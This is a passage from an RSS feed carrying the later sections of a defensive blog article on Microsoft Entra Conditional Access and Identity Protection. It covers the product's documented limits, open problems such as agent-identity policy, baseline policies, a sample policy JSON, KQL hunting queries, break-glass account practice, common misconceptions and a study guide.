&lt;/blockquote&gt;
&lt;h3&gt;(b) Post-issuance token theft&lt;/h3&gt;
&lt;p&gt;Once a refresh token is exfiltrated -- whether via an adversary-in-the-middle phishing kit like Evilginx [@ms-aitm-phishing-blog], an infostealer that scrapes the token cache, or a malicious browser extension -- the pre-issuance CA evaluation is bypassed. The attacker has a bearer token. They can present it to the resource API directly. CAE-aware resource providers can revoke mid-session on the published critical-event list, but the latency ceiling is &quot;up to 15 minutes&quot; for non-IP events [@ms-cae-concept]. In fifteen minutes a competent attacker has done plenty.&lt;/p&gt;
&lt;p&gt;The mitigation is &lt;em&gt;device-bound&lt;/em&gt; credentials: Primary Refresh Tokens bound to &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM&lt;/a&gt; hardware, FIDO2 with hardware attestation, certificate-based authentication with hardware-protected keys [@ms-prt-concept]. A bearer token bound to a TPM is not exfiltratable in the same way; the wrapped key material never leaves the device.&lt;/p&gt;
&lt;h3&gt;(c) Consent-grant phishing&lt;/h3&gt;
&lt;p&gt;CA evaluates &lt;em&gt;authentication&lt;/em&gt;, not &lt;em&gt;authorization grants&lt;/em&gt; that a user makes to a malicious OAuth app. A user who clicks &quot;Allow&quot; on a permissions-consent prompt for an attacker-controlled app has performed an OAuth authorization, not a sign-in. The malicious app now has the user&apos;s delegated permissions for whatever scopes were granted. CA was not invoked because CA gates the user&apos;s sign-ins; it does not inspect the user&apos;s OAuth grants. Microsoft Defender for Cloud Apps documents the attack class as &quot;risky OAuth apps&quot; and ships investigation and remediation tooling on a separate plane from CA [@ms-illicit-consent-grant].&lt;/p&gt;
&lt;p&gt;Admin consent settings, app governance policies, and explicit allow-listing of acceptable publishers live on that different plane. The policy admin who deploys CA needs to deploy app governance separately.&lt;/p&gt;
&lt;h3&gt;(d) Risk evaluation is probabilistic&lt;/h3&gt;
&lt;p&gt;Identity Protection produces a &lt;em&gt;score&lt;/em&gt;, not a &lt;em&gt;proof&lt;/em&gt;. A &quot;high&quot; risk level is a confidence; it is not the assertion &quot;this sign-in is definitely an attack.&quot; No vendor in the Section 7 survey publishes precision or recall numbers for its risk engine. The operating point -- the threshold that maps a continuous score to discrete buckets -- is a trade-off that the vendor calibrates and the customer does not see.&lt;/p&gt;
&lt;p&gt;This is a &lt;em&gt;structural&lt;/em&gt; lower bound on any ML-driven risk plane, not a Microsoft-specific failure. Any classifier has false positives and false negatives. A risk-aware CA policy that says &quot;block at high risk&quot; will, with non-zero probability, block a legitimate sign-in. A policy that says &quot;require MFA at medium risk&quot; will, with non-zero probability, let through a sophisticated attacker whose detections fall under the threshold.&lt;/p&gt;
&lt;h3&gt;(e) Workload-identity CA is constrained by design&lt;/h3&gt;
&lt;p&gt;Block-only grants. No managed identities. No group assignments. The full human grant taxonomy does not transfer because a service principal cannot perform an MFA challenge, cannot register a FIDO2 key, cannot accept a terms-of-use document. The Microsoft Learn page on workload-identity CA enumerates the constraints precisely [@ms-workload-identity-ca]. Section 9 will name this as an &lt;em&gt;open&lt;/em&gt; problem; for now, treat it as a documented limit.&lt;/p&gt;
&lt;h3&gt;The theorems behind the limits&lt;/h3&gt;
&lt;p&gt;Some of these limits are engineering choices that could be different in a future product. Some are deeper.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Saltzer and Schroeder 1975&lt;/strong&gt; [@saltzer-schroeder-1975] give the upper bound on aspirations: complete mediation across every authentication and authorization decision &lt;em&gt;within scope of mediation&lt;/em&gt;. The principle does not constrain what is in scope. It constrains what you must do for whatever you have decided is in scope. On-prem AD is out of scope for CA by Microsoft&apos;s product decision; complete mediation cannot fix that, because the principle is about consistency &lt;em&gt;within&lt;/em&gt; the boundary, not about expanding the boundary.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Harrison-Ruzzo-Ullman 1976&lt;/strong&gt; -- usually shortened to HRU [@harrison-ruzzo-ullman-1976] -- gives the lower bound on static analysis. The safety question in the general access-matrix model is &lt;em&gt;undecidable&lt;/em&gt;. In informal terms: there is no general algorithm that proves a Conditional Access policy edit cannot, under some future edit chain, leak a sensitive right. This is why every vendor in the survey relies on &lt;em&gt;evaluation-time&lt;/em&gt; mediation (the engine decides at the moment of the request) rather than &lt;em&gt;static-proof&lt;/em&gt; analysis (the engine certifies in advance that no edit can ever leak). Cedar&apos;s intentional restriction to a decidable fragment, in AWS Verified Access, is the counter-strategy: trade expressiveness for analysability.&lt;/p&gt;
&lt;p&gt;The bearer-token revocation trade-off is informal but real: the worst-case revocation latency is bounded below by the token&apos;s natural lifetime, unless a side channel exists. CAE is that side channel. Its latency is bounded by the propagation time of the channel (up to 15 minutes for non-IP events, instant for IP). Shorten the channel further and you discover that the IdP-to-resource-API event delivery has its own infrastructure costs.&lt;/p&gt;

The practical implication of HRU for a CA admin is that there is no tool, anywhere, that can examine your tenant&apos;s CA policies and certify that no sequence of policy edits could ever leak access to a sensitive resource. Vendors offer policy *testers* that simulate a single edit against the current population; that is decidable. The question &quot;is the system safe under all possible future edits?&quot; is not. This is why audit trails, change-control gates, and least-privilege role assignments on the CA admin role matter as much as the CA policies themselves.
&lt;p&gt;Naming the limits clears the way to name the &lt;em&gt;active&lt;/em&gt; unsolved problems -- the ones the field is still working on, where the current state of the art admits it is partial.&lt;/p&gt;
&lt;h2&gt;9. Where the policy plane is still incomplete&lt;/h2&gt;
&lt;p&gt;Microsoft&apos;s own 2026 documentation for Conditional Access on AI agents calls the current implementation &quot;a lightweight enforcement mechanism designed to block unauthorized or risky agents, not a full policy suite.&quot; That is not marketing modesty. It is an admission that the most active frontier of policy enforcement -- &lt;a href=&quot;https://paragmali.com/blog/agentic-identity-on-windows-when-the-process-acting-on-your-/&quot; rel=&quot;noopener&quot;&gt;agent identities&lt;/a&gt; -- is deliberately under-specified.&lt;/p&gt;
&lt;p&gt;Five open problems sit on that frontier in 2026.&lt;/p&gt;

Organizations are expanding Zero Trust across more users, applications, and now a growing population of AI agent identities ... the Conditional Access Optimization Agent moves beyond static guidance to continuous, context-aware identity posture optimization. [@ms-techcom-ca-optimization-agent]
&lt;h3&gt;9.1 Agent identity policy semantics&lt;/h3&gt;
&lt;p&gt;What grants should exist for AI agents beyond block and allow? Useful candidate grants include: &quot;read-but-not-move&quot; for mail or files; &quot;business-hours-only&quot;; &quot;any autonomous action requires a fresh sign-off from the on-behalf-of human.&quot; None of these exist as first-class CA grant types in 2026.&lt;/p&gt;
&lt;p&gt;What does exist: CA targeting of agent identities -- the ability to &lt;em&gt;match&lt;/em&gt; a policy on the agent identity rather than the human -- and the Conditional Access Optimization Agent, which gives administrators continuous recommendations on policy posture [@ms-techcom-ca-optimization-agent]. The targeting is there. The grant taxonomy is still mostly the human one, applied imperfectly.&lt;/p&gt;
&lt;h3&gt;9.2 Cross-vendor CAEP interop&lt;/h3&gt;
&lt;p&gt;The wire format was finalised in September 2025 [@helpnet-2025-openid][@openid-caep-final]. Production receiver coverage outside Microsoft Entra-internal resource providers is partial. Two large vendors agreeing on an event schema is necessary but not sufficient for cross-vendor revocation to work in practice; the receiving side needs to &lt;em&gt;act&lt;/em&gt; on the events. The next eighteen months are the period in which CAEP either becomes the cross-vendor wire format for revocation, or it does not.&lt;/p&gt;
&lt;h3&gt;9.3 Workload-identity grant set&lt;/h3&gt;
&lt;p&gt;What richer expressions could exist for non-human identities? The current Microsoft Learn page lists workload-identity detections: &lt;code&gt;investigationsThreatIntelligence&lt;/code&gt;, &lt;code&gt;suspiciousSignins&lt;/code&gt;, &lt;code&gt;adminConfirmedServicePrincipalCompromised&lt;/code&gt;, &lt;code&gt;leakedCredentials&lt;/code&gt;, &lt;code&gt;maliciousApplication&lt;/code&gt;, &lt;code&gt;suspiciousApplication&lt;/code&gt;, &lt;code&gt;anomalousServicePrincipalActivity&lt;/code&gt;, &lt;code&gt;suspiciousAPITraffic&lt;/code&gt; [@ms-workload-identity-risk]. The detections exist; the grant taxonomy stops at block.&lt;/p&gt;
&lt;p&gt;Candidate richer grants: &quot;workload attestation&quot; (the service principal proves it is running on attested infrastructure), &quot;verifiable claim from a trusted attester&quot; (a third party signs a statement about the workload), &quot;step-up authorization for sensitive scopes&quot; (a higher-privilege scope requires a separate per-request authorization step). None of these is generally available in 2026.&lt;/p&gt;

A non-human identity in Entra ID: a service principal, an application registration&apos;s owned service principal, or a managed identity in Azure. Workload identities authenticate via client secrets, client certificates, federated credentials, or (for managed identities) instance-metadata-service tokens. Conditional Access for workload identities currently applies only to single-tenant service principals registered in the tenant; it does not cover multi-tenant SaaS apps or managed identities [@ms-workload-identity-ca].
&lt;h3&gt;9.4 The break-glass paradox&lt;/h3&gt;
&lt;p&gt;Emergency-access accounts must be excluded from CA. If a CA misconfiguration locks out every admin, the break-glass account is the recovery path. But exclusion creates a high-value bypass: an attacker who compromises a break-glass account inherits its exclusion.&lt;/p&gt;
&lt;p&gt;There is no clean answer. Microsoft&apos;s guidance is exclusion plus FIDO2 binding plus alerting: the break-glass accounts have hardware-bound FIDO2 keys (so they cannot be phished), they are excluded from all CA policies (so misconfiguration cannot lock them out), and &lt;em&gt;every&lt;/em&gt; sign-in is alerted on (so misuse is detected within minutes) [@ms-emergency-access].&lt;/p&gt;

Run two break-glass accounts, not one. Store the FIDO2 keys in separate physical safes under separate custodians. Never use them for anything but a recovery exercise once per quarter; if they sign in unexpectedly, treat the alert as a P1 incident. The operational pattern accepts that you have a bypass and treats the bypass as the highest-value alert in the tenant [@ms-emergency-access].
&lt;h3&gt;9.5 The risk-engine transparency problem&lt;/h3&gt;
&lt;p&gt;No vendor in the Section 7 survey publishes model architecture, feature vector size, or per-detection precision and recall. Microsoft does not. Okta does not. Google does not. Defenders, auditors, and regulators must accept a black-box score.&lt;/p&gt;
&lt;p&gt;This matters in three places. First, for incident response: when an &quot;atypical travel&quot; detection fires for an executive, the responder cannot see which features contributed and how strongly. Second, for compliance: an auditor asked to evidence the effectiveness of the control plane gets the operating output (3-tier risk levels) but not a quantitative evaluation. Third, for the risk-engine vendors themselves, who must respond to legitimate regulatory questions about model bias and operational reliability without revealing the architecture that attackers would use to evade detection.&lt;/p&gt;
&lt;p&gt;The article does not predict a resolution. It names the gap.&lt;/p&gt;
&lt;p&gt;The architecture is incomplete by admission. It is also actionable today. A competent tenant administrator can deploy a sensible baseline in an afternoon.&lt;/p&gt;
&lt;h2&gt;10. Using Conditional Access today&lt;/h2&gt;
&lt;p&gt;The architectural story ends; the operational story begins. Here is what a competent tenant looks like in 2026.&lt;/p&gt;
&lt;h3&gt;The licensing reality&lt;/h3&gt;
&lt;p&gt;Conditional Access is not a feature every Microsoft 365 tenant gets. It is a feature gated by SKU. The licensing tiers are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Entra ID Free.&lt;/strong&gt; Security Defaults only [@ms-security-defaults]. No Conditional Access policies. No risk-based conditions. No CA-driven CAE (the critical-event-evaluation subsystem -- for events like account disable, password reset, and high user risk -- still propagates to CAE-aware M365 services at the service layer regardless of SKU; see Section 6.6) [@ms-cae-concept].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Entra ID P1.&lt;/strong&gt; Conditional Access is unlocked [@ms-ca-overview]. You can author policies with any of the non-risk conditions: users, apps, locations, devices, client app, platform. You can demand any of the non-risk grants.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Entra ID P2.&lt;/strong&gt; Adds risk-based conditions. &lt;code&gt;signInRiskLevels&lt;/code&gt; and &lt;code&gt;userRiskLevels&lt;/code&gt; become usable [@ms-id-protection-overview]. ID Protection&apos;s full report pane (risky users, risky sign-ins, risk detections) is accessible. The legacy ID-Protection-side risk policies retire 1 October 2026 [@ms-id-protection-policies].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Workload Identities Premium.&lt;/strong&gt; A separate SKU. Unlocks CA scoped to service principals [@ms-workload-identity-ca].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This corrects a premise discarded earlier: &quot;Conditional Access is the policy plane every M365 tenant runs on&quot; is &lt;em&gt;not&lt;/em&gt; true. Many tenants run on Security Defaults. The &quot;policy plane every tenant runs on&quot; is the cloud sign-in pipeline; CA is the configurable richer layer that P1+ tenants opt into.&lt;/p&gt;
&lt;h3&gt;Start with the managed baselines&lt;/h3&gt;
&lt;p&gt;Microsoft-managed Conditional Access policies are the recommended starting point [@ms-managed-policies]. They auto-deploy in Report-only mode, run for at least 45 days while administrators review the impact in the Sign-in logs, and are auto-enabled with a 28-day pre-enablement notification unless administrators opt out [@ms-managed-policies]. The currently shipping baselines, per Microsoft Learn, include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;MFA for admins accessing Microsoft admin portals (the most-privileged roles).&lt;/li&gt;
&lt;li&gt;MFA for users who already have per-user MFA enabled (a migration aid).&lt;/li&gt;
&lt;li&gt;MFA and reauthentication for risky sign-ins (the P2 baseline).&lt;/li&gt;
&lt;li&gt;Block legacy authentication.&lt;/li&gt;
&lt;li&gt;Block access for high-risk users (P2-tier protection on the user-risk surface).&lt;/li&gt;
&lt;li&gt;Block all high-risk agents accessing all resources (Preview, AI-agent surface).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The original announcement called for a 90-day report-only window [@weinert-2023-managed-policies][@helpnet-2023-microsoft-entra-policies]. The current default is 45 days [@ms-managed-policies]; the window shrank as Microsoft gained confidence that customers were not surprised by the auto-enablement.&lt;/p&gt;
&lt;h3&gt;Five custom policies on top of the baselines&lt;/h3&gt;
&lt;p&gt;Beyond the managed policies, every well-run tenant in operational experience runs five custom policies on top of the baselines [@ms-ca-policy-common]: block legacy authentication unconditionally [@ms-managed-policies]; require the phishing-resistant Authentication Strength for any user in a privileged role [@ms-auth-strengths]; require &lt;code&gt;compliantDevice&lt;/code&gt; for admin centres, finance apps, and customer-data exports [@ms-intune-compliance-partners]; restrict privileged sign-ins to a named-location allow-list with block-or-step-up outside it [@ms-ca-network]; and, where Entra ID P2 is licensed, demand a sign-in-risk-based step-up (MFA at high risk, a passwordless or phishing-resistant method at medium risk) [@ms-id-protection-policies].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; 1. Block legacy authentication. 2. Phishing-resistant Authentication Strength for admin roles. 3. Require compliant device for sensitive applications. 4. Named-location restrictions for privileged roles. 5. Sign-in-risk-based step-up where Entra ID P2 is available.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Automation entry points (Microsoft Graph)&lt;/h3&gt;
&lt;p&gt;The Graph endpoints administrators care about:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;GET /identity/conditionalAccess/policies&lt;/code&gt; -- list policies. &lt;code&gt;POST&lt;/code&gt; to create, &lt;code&gt;PATCH&lt;/code&gt; to update [@ms-graph-capolicy].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GET /identityProtection/riskDetections&lt;/code&gt; -- the per-detection log. Filterable by &lt;code&gt;riskLevel&lt;/code&gt;, &lt;code&gt;riskState&lt;/code&gt;, &lt;code&gt;userPrincipalName&lt;/code&gt;, &lt;code&gt;activityDateTime&lt;/code&gt; [@ms-graph-riskdetection].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GET /identityProtection/riskyUsers&lt;/code&gt; -- the per-user risk view.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A policy authored in code looks like this (truncated for readability):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &quot;displayName&quot;: &quot;Require phishing-resistant for admins&quot;,
  &quot;state&quot;: &quot;enabledForReportingButNotEnforced&quot;,
  &quot;conditions&quot;: {
    &quot;users&quot;: { &quot;includeRoles&quot;: [&quot;62e90394-69f5-4237-9190-012177145e10&quot;] },
    &quot;applications&quot;: { &quot;includeApplications&quot;: [&quot;All&quot;] }
  },
  &quot;grantControls&quot;: {
    &quot;operator&quot;: &quot;OR&quot;,
    &quot;authenticationStrength&quot;: { &quot;id&quot;: &quot;00000000-0000-0000-0000-000000000004&quot; }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The recommended deployment dance is &lt;code&gt;enabledForReportingButNotEnforced&lt;/code&gt; first; let the Sign-in log show you the impact for a calibration window; promote to &lt;code&gt;enabled&lt;/code&gt; only after the report-only data matches expectations [@ms-ca-report-only].&lt;/p&gt;
&lt;h3&gt;Audit-time visibility&lt;/h3&gt;
&lt;p&gt;Three surfaces matter:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sign-in logs&lt;/strong&gt; in the Entra portal show the per-sign-in evaluation, including which CA policies matched and which grants were satisfied.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Risk-detection log&lt;/strong&gt; in Identity Protection (P2 only) shows the per-detection narrative: which &lt;code&gt;riskEventType&lt;/code&gt; fired, with what &lt;code&gt;additionalInfo&lt;/code&gt;, against which user.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The What-If tool&lt;/strong&gt; simulates a policy evaluation for a hypothetical sign-in, before you enable a policy.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Detection engineering&lt;/h3&gt;
&lt;p&gt;For E5 tenants, the Sign-in logs and risk detections flow into Microsoft Sentinel (via the Microsoft Entra ID connector) or Defender XDR [@ms-sentinel-aad-connector]. A KQL skeleton for high-risk-with-CA-failure looks like:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-kusto&quot;&gt;SigninLogs
| where ResultType != 0
| join kind=inner (AADRiskDetections | where RiskLevel == &quot;high&quot;) on UserPrincipalName, CorrelationId
| project TimeGenerated, UserPrincipalName, IPAddress, ConditionalAccessStatus, RiskEventType, FailureReason
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The aggregate scale figure is worth remembering: Microsoft processes &quot;more than 100 trillion security signals&quot; daily across all identity products [@ms-managed-policies]. The detection engineer is consuming a small slice that landed in their tenant.&lt;/p&gt;

Run the following in Microsoft Sentinel or the Entra advanced hunting blade to surface sign-ins that succeeded *despite* a high-confidence risk detection -- the most operationally interesting subset. The query is original to this article; the schema it targets is the canonical Microsoft Sentinel Entra ID connector tables `SigninLogs` and `AADRiskDetections` [@ms-sentinel-aad-connector], and the join-and-filter pattern follows the practice documented in Microsoft&apos;s Sentinel hunting guidance [@ms-sentinel-hunting].&lt;pre&gt;&lt;code class=&quot;language-kusto&quot;&gt;let window = 7d;
SigninLogs
| where TimeGenerated &amp;gt; ago(window)
| where ResultType == 0
| where ConditionalAccessStatus == &quot;success&quot;
| join kind=inner (
    AADRiskDetections
    | where TimeGenerated &amp;gt; ago(window)
    | where RiskLevel == &quot;high&quot;
) on UserPrincipalName, CorrelationId
| project TimeGenerated, UserPrincipalName, IPAddress, AppDisplayName, RiskEventType, ConditionalAccessPolicies
| order by TimeGenerated desc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The expected count for a well-tuned tenant is small. Spikes warrant a P2 investigation.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;Break-glass&lt;/h3&gt;
&lt;p&gt;Two emergency-access accounts. FIDO2-bound. Excluded from every CA policy. Stored as separate hardware tokens in separate safes. Every sign-in is wired to a P1 alert. Per Section 9.4 and Microsoft Learn&apos;s emergency-access guidance, this is the acknowledged operational compromise to the break-glass paradox [@ms-emergency-access].&lt;/p&gt;

A non-personal Entra ID administrator account excluded from Conditional Access and from MFA enforcement, used only when the primary identity infrastructure has failed. Best practice: at least two such accounts, with hardware FIDO2 keys stored separately, monitored by an unconditional alert on any sign-in.
&lt;p&gt;The article has answered &quot;who decided?&quot; five times over: by signal, by policy, by token, by session, by operational pattern. One section remains: the misconceptions that keep recurring.&lt;/p&gt;
&lt;h2&gt;11. Misconceptions that recur&lt;/h2&gt;
&lt;p&gt;Every time these questions come up in practice, the same wrong answers come back. The corrections are worth memorising.&lt;/p&gt;

Only if you have Entra ID P1 or higher and have configured CA policies. Free SKU tenants run Security Defaults, which is a coarse tenant-wide on/off switch, not CA [@ms-security-defaults]. CA is unlocked at P1 [@ms-ca-overview]; risk-based conditions are unlocked at P2 [@ms-id-protection-overview]. The &quot;every tenant runs on CA&quot; framing you sometimes see in marketing material is incorrect.

No. CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers do not consult Entra at all [@ms-ca-overview]. If your threat model includes on-prem lateral movement, layer in Defender for Identity and the standard on-prem hardening playbook.

No. CAE is event-driven push from the policy plane to CAE-aware resource APIs. The Microsoft Learn CAE document gives the latency ceiling precisely: &quot;the goal for critical event evaluation is for response to be near real time, but latency of up to 15 minutes might be observed because of event propagation time; however, IP locations policy enforcement is instant&quot; [@ms-cae-concept]. There is no 30-second poll. The token can live up to 28 hours because the revocation is event-driven.

No. Clients advertise CAE-readiness via the `cp1` client capability in token requests, specifically by adding `cp1` to the `xms_cc` claim mechanism (or by calling `WithClientCapabilities(new[] { &quot;cp1&quot; })` in MSAL) [@ms-claims-challenge][@ms-app-resilience-cae]. The Microsoft Learn claims-challenge page is explicit: &quot;The only currently known value is `cp1`&quot; [@ms-claims-challenge]. The CAE-aware token is recognisable by its long lifetime (up to 28 hours) and by the resource API&apos;s willingness to issue an `insufficient_claims` challenge, not by a Boolean claim.

No. Third-party MDM compliance partners can write the device compliance state into Entra via Intune&apos;s compliance-partner API [@ms-intune-compliance-partners]. The CA grant reads `isCompliant` on the device object; it does not care which MDM wrote that value. Microsoft&apos;s preferred deployment is Intune, but the integration point is open by design.

In 2023. The public preview of CA filters for workload identities opened on 26 October 2022 [@vansurksum-2022-workload-ca]; the Microsoft Entra Workload Identities standalone product reached GA in late November 2022, and the Conditional Access feature itself reached general availability later in 2023 [@ms-workload-identity-ca]. Any article asserting a 2025 GA date for workload-identity CA is incorrect.

No. Every sign-in produces a Sign-in log entry; ID Protection emits a `riskDetection` only when at least one detector fires for that sign-in [@ms-graph-riskdetection]. Most sign-ins produce no `riskDetection`. Detection engineers querying for risk should join the Sign-in log with the riskDetections log and treat unjoined rows as &quot;no risk flagged at the moment.&quot;

No Microsoft primary source publicly describes the production model architecture or names a per-sign-in feature-vector size. What is published is the detection taxonomy (about two dozen named `riskEventType` values [@ms-id-protection-risks][@ms-graph-riskdetection]), the timing split (real-time / near-real-time / offline [@ms-risk-detection-types]), and the three-tier risk output. The &quot;transformer with 80+ signals&quot; framing is folk knowledge with no Microsoft primary source behind it. The article reframes it as &quot;ML-based with detailed architecture publicly undisclosed.&quot;

Not on its own. A standard MFA grant does not defeat a kit like Evilginx, which proxies both the password and the MFA challenge in real time. The defence is to require the *phishing-resistant Authentication Strength* in CA: FIDO2 with hardware attestation, Windows Hello for Business, or multifactor certificate-based authentication [@ms-auth-strengths]. The cryptographic origin-binding in WebAuthn-class credentials defeats AitM by construction. But the defence only works *when the grant is applied*. A CA policy that demands phishing-resistant for admin roles but not for users will block AitM against admins and not against users.
&lt;h2&gt;12. Two planes, one boundary&lt;/h2&gt;
&lt;p&gt;Replay Alice&apos;s Tuesday.&lt;/p&gt;
&lt;p&gt;Identity Protection&apos;s signal plane scored her 09:02 sign-in. The score was below the medium-risk threshold. Conditional Access&apos;s policy plane evaluated four matching policies. Two demanded MFA; her cached refresh token already satisfied that grant from yesterday. One demanded a compliant device; Intune had marked her laptop compliant overnight. None demanded the block grant. The token issuer issued a CAE-aware bearer token with a 28-hour lifetime. Exchange Online accepted the token. Outlook&apos;s data path opened. Bytes returned to Alice.&lt;/p&gt;
&lt;p&gt;If, twelve minutes later, an attacker tries to sign in with Alice&apos;s credentials from an anonymizing proxy, ID Protection will fire a detection. The detection will lift her user risk to high. CAE will deliver the high-user-risk event to Exchange. Exchange will issue a claims challenge on the next call from Alice&apos;s Outlook. Outlook will replay the challenge to Entra. Entra will re-run CA, see the elevated risk, demand step-up MFA, and either issue a fresh token (after Alice satisfies the step-up) or refuse.&lt;/p&gt;
&lt;p&gt;The modern identity boundary is not a wall. It is a conversation between planes.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The boundary is a conversation between planes, not a wall.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The open frontier is real. Agent identities want a richer grant taxonomy than the human one provides. Cross-vendor CAEP wants production receivers outside Microsoft. Workload-identity policy wants grants that go beyond block. The break-glass paradox wants an answer that does not depend on operational discipline. None of these problems will resolve in 2026. They are the next frontier.&lt;/p&gt;
&lt;p&gt;What the reader should now be able to do: trace a sign-in through the signal, policy, token, and session planes; read a &lt;code&gt;conditionalAccessPolicy&lt;/code&gt; JSON and predict the evaluation outcome; identify which class of attack each grant defends against; and name, by reference to specific Microsoft Learn pages, what CA does &lt;em&gt;not&lt;/em&gt; defend against. The promise from Section 1 is delivered.&lt;/p&gt;

Today, 100 percent of consumer Microsoft accounts older than 60 days have multifactor authentication. -- Alex Weinert, Microsoft Identity, November 2023 [@weinert-2023-managed-policies]
&lt;p&gt;Who decided this token is good? The boundary itself decided, by composing the work of every plane named above.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;conditional-access-and-entra-id-protection&quot; keyTerms={[
  { term: &quot;Conditional Access (CA)&quot;, definition: &quot;Microsoft Entra&apos;s JSON-driven policy engine that matches users, apps, and conditions against grants such as block, MFA, and phishing-resistant Authentication Strength.&quot; },
  { term: &quot;Microsoft Entra ID Protection&quot;, definition: &quot;The ML-driven signal plane that emits riskDetection events tagged with riskEventType, riskLevel, riskState, and detectionTimingType.&quot; },
  { term: &quot;Continuous Access Evaluation (CAE)&quot;, definition: &quot;The event-driven session plane between Entra and CAE-aware resource APIs; uses HTTP 401 with WWW-Authenticate insufficient_claims to trigger mid-session re-evaluation.&quot; },
  { term: &quot;Sign-in risk vs user risk&quot;, definition: &quot;Sign-in risk is per-session probability the credential is being used by an attacker; user risk is per-user probability the account is compromised over recent history.&quot; },
  { term: &quot;Authentication Strength&quot;, definition: &quot;A named bundle of acceptable authentication methods that a CA grant can demand; the phishing-resistant strength defeats AitM by binding the credential to the relying-party origin via WebAuthn.&quot; },
  { term: &quot;Primary Refresh Token (PRT)&quot;, definition: &quot;A long-lived refresh token issued to a Windows session at user sign-in to Entra-joined or hybrid-joined devices, bound to the TPM where available, subject to CA at issuance.&quot; },
  { term: &quot;Claims challenge (insufficient_claims)&quot;, definition: &quot;HTTP 401 wire format CAE uses to demand a fresh token: WWW-Authenticate: Bearer error=&quot;insufficient_claims&quot;, claims=&quot;&quot;.&quot; },
  { term: &quot;Workload identity&quot;, definition: &quot;A non-human Entra identity (service principal, managed identity, or app registration&apos;s owned service principal); CA for workload identities applies only to single-tenant service principals with a block-only grant set.&quot; },
  { term: &quot;Break-glass account&quot;, definition: &quot;An emergency-access account excluded from Conditional Access, ideally FIDO2-bound, monitored by an unconditional sign-in alert.&quot; }
]} questions={[
  { q: &quot;What is the only API surface between Entra ID Protection (the signal plane) and Conditional Access (the policy plane), and why does the answer explain the maintainability of the architecture across a decade?&quot;, a: &quot;Two condition keys on the CA policy: signInRiskLevels and userRiskLevels. Because the contract is two strings, the risk model can be re-trained without policy rewrites, and policies can evolve without retraining the model.&quot; },
  { q: &quot;Why did Microsoft reject the &apos;shortened token lifetime&apos; approach to revocation, and what did they ship instead?&quot;, a: &quot;Shortened token lifetimes degraded user experience and reliability without eliminating risks (Microsoft&apos;s documented &apos;blunt object&apos; framing). CAE lengthens tokens (up to 28 hours) and adds an event-driven side channel that fires HTTP 401 with insufficient_claims when a critical event occurs.&quot; },
  { q: &quot;Name the documented critical events that fire a CAE claims challenge, and the documented latency ceiling.&quot;, a: &quot;Five critical events: account disabled or deleted, password change or reset, MFA enabled by an admin, admin token revocation, and high user risk detected by ID Protection. A parallel pathway propagates network-location and CA policy changes on the same channel. Latency is up to 15 minutes for non-IP events, instant for IP locations.&quot; },
  { q: &quot;Why does Conditional Access not gate on-prem Active Directory logons?&quot;, a: &quot;CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers authenticate against the on-prem KDC and do not consult Entra. This is a documented scope limit, not a bug.&quot; },
  { q: &quot;What HRU result establishes a theoretical lower bound on what CA can guarantee, and what is the practical implication?&quot;, a: &quot;Harrison-Ruzzo-Ullman 1976 proves the safety question in the general access-matrix model is undecidable. Practically, no tool can certify that no sequence of policy edits will ever leak access to a sensitive resource; vendors rely on evaluation-time mediation rather than static proof.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>conditional-access</category><category>entra-id</category><category>identity-protection</category><category>continuous-access-evaluation</category><category>zero-trust</category><category>security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Agentic Identity on Windows: When the Process Acting on Your Behalf Isn&apos;t You</title><link>https://paragmali.com/blog/agentic-identity-on-windows-when-the-process-acting-on-your-/</link><guid isPermaLink="true">https://paragmali.com/blog/agentic-identity-on-windows-when-the-process-acting-on-your-/</guid><description>Every AI agent on Windows in 2026 runs as the logged-on user. The cloud-identity layer has crossed the agent-attribution gap; the OS layer has not. This article maps the FIDO AATWG pillars onto Windows primitives and asks what is missing.</description><pubDate>Mon, 25 May 2026 00:00:00 GMT</pubDate><content:encoded>
